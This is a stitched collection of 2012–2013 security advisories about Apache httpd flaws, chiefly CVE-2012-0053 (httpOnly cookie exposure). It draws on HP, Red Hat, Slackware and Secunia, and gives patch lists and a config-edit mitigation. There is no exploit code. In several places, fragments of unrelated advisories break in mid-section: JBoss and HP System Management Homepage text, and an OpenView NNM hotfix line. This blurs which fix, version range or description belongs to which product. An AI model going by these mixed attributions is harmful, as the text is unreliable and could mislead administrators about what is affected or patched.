SUMMARY\nA potential security vulnerability has been identified with HP XP P9000\nCommand View Advanced Edition Suite products including HP P9000 Command View\nAdvanced Edition Software (DevMgr), HP XP Provisioning Manager Software\n(ProvMgr), HP P9000 Replication Manager Software (RepMgr), and HP P9000\nTiered Storage Manager Software (TSMgr). The vulnerability could be remotely\nexploited resulting in a disclosure of information. \n\nReferences: CVE-2012-0053\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP XP P9000 Command View Advanced Edition Suite Software:\n\nSoftware Product\n Affected Versions (Platform)\n\nHP P9000 Command View Advanced Edition Software (DevMgr)\n 7.0.0-00 to earlier than 7.4.1-00 (Windows/Linux)\n\nHP XP Provisioning Manager Software (ProvMgr)\n 5.0.0-00 to earlier than 7.0.0-00 (Windows/Linux)\n\nNOTE : From version 7.0.0-00 and subsequent, ProvMgr has been integrated into\nDevMgr. \n\nHP P9000 Tiered Storage Manager Software (TSMgr)\n 5.0.0-00 to earlier than 7.4.1-00 (Windows/Linux)\n\nHP P9000 Replication Monitor Software (RepMon)\n 5.0.0-00 to earlier than 6.0.0-00 (Windows)\n\nHP P9000 Replication Manager Software (RepMgr)\n 6.0.0-00 to earlier than 7.4.1-00 (Windows)\n7.0.0-00 to earlier than 7.4.1-00 (Linux)\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates for HP XP P9000 Command View Advanced\nEdition Suite products. In addition, instructions for a Mitigation Solution\nare also provided below. \n\nSoftware Product\n Software Version Updates (Platform)\n\nHP P9000 Command View Advanced Edition Software (DevMgr)\n 7.4.1-00 or subsequent (Windows/Linux)\n\nHP XP Provisioning Manager Software (ProvMgr)\n Please apply the Mitigation Solution below\n\nHP P9000 Tiered Storage Manager Software (TSMgr)\n 7.4.1-00 or subsequent (Windows/Linux)\n\nHP P9000 Replication Monitor Software (RepMon)\n Please apply the Mitigation Solution below\n\nHP P9000 Replication Manager Software (RepMgr)\n 7.4.1-00 or subsequent (Windows/Linux)\n\nMitigation Solution - The following procedure can be applied to avoid this\nvulnerability:\n\nOpen a command window and change to the current directory by executing the\nfollowing command:\n\nWindows... \n\ncd Common-Component-installation-directory\\bin\n\nLinux ... \n\ncd Common-Component-installation-directory/bin\n\nStop the services of P9000 Command View AE Suite products by executing the\nfollowing command:\n\nhcmdssrv /stop\n\nBackup the file below, then open it with a text editor:\n\nWindows... \n\nCommon-Component-installation-directory\\httpsd\\conf\\httpsd.conf\n\nLinux ... \n\nCommon-Component-installation-directory/httpsd/conf/httpsd.conf\n\nIn the above file, after the line:\n\n(ErrorDocument 417 \"Expectation Failed\"),\n\nAdd the line :\n\n(ErrorDocument 400 \"Bad Request\")\n\nNOTE : For the products listed below, a slightly different version of the\nline must be added instead. Product\n Version (Platform)\n\nCVXPAE\n 5.0.0-00 to earlier than 5.8.0-00 (Windows)\n5.1.0-00 to earlier than 5.8.0-00 (Linux)\n\nProvMgr\n 5.0.0-00 to earlier than 5.8.0-00 (Windows)\n5.1.0-00 to earlier than 5.8.0-00 (Linux)\n\nTSMgr\n 5.0.0-00 to earlier than 5.8.0-00 (Windows)\n5.1.0-00 to earlier than 5.8.0-00 (Linux)\n\nRepMon\n 5.0.0-00 to earlier than 5.8.0-00 (Windows)\n\nAdd the following line to the end of the file styled in the following manner:\n\n(ErrorDocument 400 \"Bad Request)\n\nNOTE : Bad Request is entered without the closing double quotation mark. If\nthis line already exists in the file, do not add it. \n\nSave the modified file. \n\nStart the services of the XP P9000 Command View AE Suite products by\nexecuting the following command:\n\nhcmdssrv /start\n\nHISTORY\nVersion:1 (rev.1) - 27 March 2013 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated\nperiodically, is contained in HP Security Notice HPSN-2011-001:\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2013 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits;damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: httpd security update\nAdvisory ID: RHSA-2012:0128-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2012-0128.html\nIssue date: 2012-02-13\nCVE Names: CVE-2011-3607 CVE-2011-3639 CVE-2011-4317 \n CVE-2012-0031 CVE-2012-0053 \n=====================================================================\n\n1. Summary:\n\nUpdated httpd packages that fix multiple security issues are now available\nfor Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\n\n3. \n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request,\nor by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header. \nMalicious JavaScript running in the server\u0027s domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user. \n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. \nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon will be restarted automatically. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n752080 - CVE-2011-3639 httpd: http 0.9 request bypass of the reverse proxy vulnerability CVE-2011-3368 fix\n756483 - CVE-2011-4317 httpd: uri scheme bypass of the reverse proxy vulnerability CVE-2011-3368 fix\n769844 - CVE-2011-3607 httpd: ap_pregsub Integer overflow to buffer overflow\n773744 - CVE-2012-0031 httpd: possible crash on shutdown due to flaw in scoreboard handling\n785069 - CVE-2012-0053 httpd: cookie exposure due to error responses\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm\n\ni386:\nhttpd-2.2.15-15.el6_2.1.i686.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm\nhttpd-tools-2.2.15-15.el6_2.1.i686.rpm\n\nx86_64:\nhttpd-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-tools-2.2.15-15.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm\n\ni386:\nhttpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm\nhttpd-devel-2.2.15-15.el6_2.1.i686.rpm\nmod_ssl-2.2.15-15.el6_2.1.i686.rpm\n\nnoarch:\nhttpd-manual-2.2.15-15.el6_2.1.noarch.rpm\n\nx86_64:\nhttpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-devel-2.2.15-15.el6_2.1.i686.rpm\nhttpd-devel-2.2.15-15.el6_2.1.x86_64.rpm\nmod_ssl-2.2.15-15.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm\n\nx86_64:\nhttpd-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-tools-2.2.15-15.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm\n\nnoarch:\nhttpd-manual-2.2.15-15.el6_2.1.noarch.rpm\n\nx86_64:\nhttpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-devel-2.2.15-15.el6_2.1.i686.rpm\nhttpd-devel-2.2.15-15.el6_2.1.x86_64.rpm\nmod_ssl-2.2.15-15.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm\n\ni386:\nhttpd-2.2.15-15.el6_2.1.i686.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm\nhttpd-devel-2.2.15-15.el6_2.1.i686.rpm\nhttpd-tools-2.2.15-15.el6_2.1.i686.rpm\nmod_ssl-2.2.15-15.el6_2.1.i686.rpm\n\nnoarch:\nhttpd-manual-2.2.15-15.el6_2.1.noarch.rpm\n\nppc64:\nhttpd-2.2.15-15.el6_2.1.ppc64.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.ppc.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.ppc64.rpm\nhttpd-devel-2.2.15-15.el6_2.1.ppc.rpm\nhttpd-devel-2.2.15-15.el6_2.1.ppc64.rpm\nhttpd-tools-2.2.15-15.el6_2.1.ppc64.rpm\nmod_ssl-2.2.15-15.el6_2.1.ppc64.rpm\n\ns390x:\nhttpd-2.2.15-15.el6_2.1.s390x.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.s390.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.s390x.rpm\nhttpd-devel-2.2.15-15.el6_2.1.s390.rpm\nhttpd-devel-2.2.15-15.el6_2.1.s390x.rpm\nhttpd-tools-2.2.15-15.el6_2.1.s390x.rpm\nmod_ssl-2.2.15-15.el6_2.1.s390x.rpm\n\nx86_64:\nhttpd-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-devel-2.2.15-15.el6_2.1.i686.rpm\nhttpd-devel-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-tools-2.2.15-15.el6_2.1.x86_64.rpm\nmod_ssl-2.2.15-15.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/httpd-2.2.15-15.el6_2.1.src.rpm\n\ni386:\nhttpd-2.2.15-15.el6_2.1.i686.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm\nhttpd-devel-2.2.15-15.el6_2.1.i686.rpm\nhttpd-tools-2.2.15-15.el6_2.1.i686.rpm\nmod_ssl-2.2.15-15.el6_2.1.i686.rpm\n\nnoarch:\nhttpd-manual-2.2.15-15.el6_2.1.noarch.rpm\n\nx86_64:\nhttpd-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.i686.rpm\nhttpd-debuginfo-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-devel-2.2.15-15.el6_2.1.i686.rpm\nhttpd-devel-2.2.15-15.el6_2.1.x86_64.rpm\nhttpd-tools-2.2.15-15.el6_2.1.x86_64.rpm\nmod_ssl-2.2.15-15.el6_2.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-3607.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-3639.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4317.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0031.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0053.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://rhn.redhat.com/errata/RHSA-2011-1391.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFPOXUIXlSAg2UNWIIRAg4AAJ9vTPttyKrbHbaSV7xCAzG89ytZgACfTSq+\nHOLS5+cKusdo+jUiYKIV4mw=\n=fM2U\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nIt was discovered that the Apache HTTP Server did not properly validate the\nrequest URI for proxied requests. \n(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an \"Internal\nServer Error\" response when processing certain malformed HTTP requests,\nwhich caused the back-end server to be marked as failed in configurations\nwhere mod_proxy was used in load balancer mode. A remote attacker could\ncause mod_proxy to not send requests to back-end AJP (Apache JServ\nProtocol) servers for the retry timeout period or until all back-end\nservers were marked as failed. \n(CVE-2011-3607)\n\nA NULL pointer dereference flaw was found in the httpd mod_log_config\nmodule. \n\nThis update also fixes the following bug:\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1330 update\nintroduced a regression in the way httpd handled certain Range HTTP header\nvalues. This update corrects this regression. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting JBoss Enterprise Web Server installation (including all\napplications and configuration files). HP System Management Homepage v7.1.1 is available here:\n\nHP System Management Homepage for Windows x64\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab\n0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Windows x86\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7\nc0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (AMD64/EM64T)\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18\nd373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (x86)\n\n[Download here] or enter the following URL into the browser address window. \nHP OpenView Network Node Manager (OV NNM) v7.53 running on HP-UX, Linux, and Solaris. \n\nMANUAL ACTIONS: Yes - NonUpdate\n\nInstall the hotfix for SSRT100772. \n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. The apr-util package has also been\nupdated to the latest version. \n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n+--------------------------+\npatches/packages/apr-util-1.4.1-i486-1_slack13.37.txz: Upgraded. \n Version bump for httpd upgrade. \npatches/packages/httpd-2.2.22-i486-1_slack13.37.txz: Upgraded. \n *) SECURITY: CVE-2011-3368 (cve.mitre.org)\n Reject requests where the request-URI does not match the HTTP\n specification, preventing unexpected expansion of target URLs in\n some reverse proxy configurations. [Joe Orton]\n *) SECURITY: CVE-2011-3607 (cve.mitre.org)\n Fix integer overflow in ap_pregsub() which, when the mod_setenvif module\n is enabled, could allow local users to gain privileges via a .htaccess\n file. [Stefan Fritsch, Greg Ames]\n *) SECURITY: CVE-2011-4317 (cve.mitre.org)\n Resolve additional cases of URL rewriting with ProxyPassMatch or\n RewriteRule, where particular request-URIs could result in undesired\n backend network exposure in some configurations. \n [Joe Orton]\n *) SECURITY: CVE-2012-0021 (cve.mitre.org)\n mod_log_config: Fix segfault (crash) when the \u0027%{cookiename}C\u0027 log format\n string is in use and a client sends a nameless, valueless cookie, causing\n a denial of service. The issue existed since version 2.2.17. PR 52256. \n [Eric Covener]\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/apr-util-1.4.1-i486-1_slack12.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/httpd-2.2.22-i486-1_slack12.0.tgz\n\nUpdated packages for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/apr-util-1.4.1-i486-1_slack12.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/httpd-2.2.22-i486-1_slack12.1.tgz\n\nUpdated packages for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/apr-util-1.4.1-i486-1_slack12.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/httpd-2.2.22-i486-1_slack12.2.tgz\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/apr-util-1.4.1-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.22-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/apr-util-1.4.1-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.22-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/apr-util-1.4.1-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.22-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/apr-util-1.4.1-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.22-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/apr-util-1.4.1-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.22-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/apr-util-1.4.1-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.22-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/apr-util-1.4.1-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.2.22-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/apr-util-1.4.1-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.2.22-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 12.0 packages:\n3143affee7e89d16a2f5b4f58f1f2c9d apr-util-1.4.1-i486-1_slack12.0.tgz\n86c2b71a544c9533794951f718bd907b httpd-2.2.22-i486-1_slack12.0.tgz\n\nSlackware 12.1 packages:\naab31157fa672bb2bc11851b486c9d5c apr-util-1.4.1-i486-1_slack12.1.tgz\n1362ef9a9b2d355e1cf9b5c7e0ae0607 httpd-2.2.22-i486-1_slack12.1.tgz\n\nSlackware 12.2 packages:\nf30f1f0a949f321b6aefb99a703eca3f apr-util-1.4.1-i486-1_slack12.2.tgz\n18fd6ddd6e6bbf4a7222ade821ec1aa1 httpd-2.2.22-i486-1_slack12.2.tgz\n\nSlackware 13.0 packages:\nd3600fef7f1cabb62554417567fb55ab apr-util-1.4.1-i486-1_slack13.0.txz\n0456c808efb92da333942ff939746d77 httpd-2.2.22-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\nd15c2e0a4aa074bbadfa50099da482b2 apr-util-1.4.1-x86_64-1_slack13.0.txz\n1b72685b2519bbf167973d88dce562e1 httpd-2.2.22-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n9c7c2bb99c99f3a6275f0dc9636ce38c apr-util-1.4.1-i486-1_slack13.1.txz\n49a5e4a73be2328d80cca186efe2f6f7 httpd-2.2.22-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n4f9dcb6495c04d3094cc68050440505b apr-util-1.4.1-x86_64-1_slack13.1.txz\n1f378f8a4d990d7298e0155b22cfcf19 httpd-2.2.22-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n7feb382700511d72737c5a31e91ee56e apr-util-1.4.1-i486-1_slack13.37.txz\n783de593b5827c8601e2b486cf98397f httpd-2.2.22-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n1bd4b3df67a0449f3015e82e47cd808d apr-util-1.4.1-x86_64-1_slack13.37.txz\n8999903e736cbb29c055ea2bf66cfed1 httpd-2.2.22-x86_64-1_slack13.37.txz\n\nSlackware -current packages:\ne709c8056cede91c35fd354ad5b654df l/apr-util-1.4.1-i486-1.txz\n97c295a42d4678537c62d6ce54d3e1fa n/httpd-2.2.22-i486-1.txz\n\nSlackware x86_64 -current packages:\n55fdf36b05ff7e82aa9a015289290424 l/apr-util-1.4.1-x86_64-1.txz\n09daa138b81fbf877596e4abc2a01bb6 n/httpd-2.2.22-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg apr-util-1.4.1-i486-1_slack13.37.txz httpd-2.2.22-i486-1_slack13.37.txz\n\nThen, restart the httpd daemon. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nHitachi Multiple Products Apache HTTP Server \"httpOnly\" Cookie\nDisclosure Vulnerability\n\nSECUNIA ADVISORY ID:\nSA51626\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/51626/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51626\n\nRELEASE DATE:\n2012-12-26\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/51626/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/51626/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51626\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nHitachi has acknowledged a vulnerability in multiple products, which\ncan be exploited by malicious people to disclose potentially\nsensitive information. \n\nFor more information see vulnerability #1 in:\nSA47779\n\nPlease see the vendor\u0027s advisory for a list of affected products. \n\nORIGINAL ADVISORY:\nHitachi (HS12-033):\nhttp://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-033/index.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer 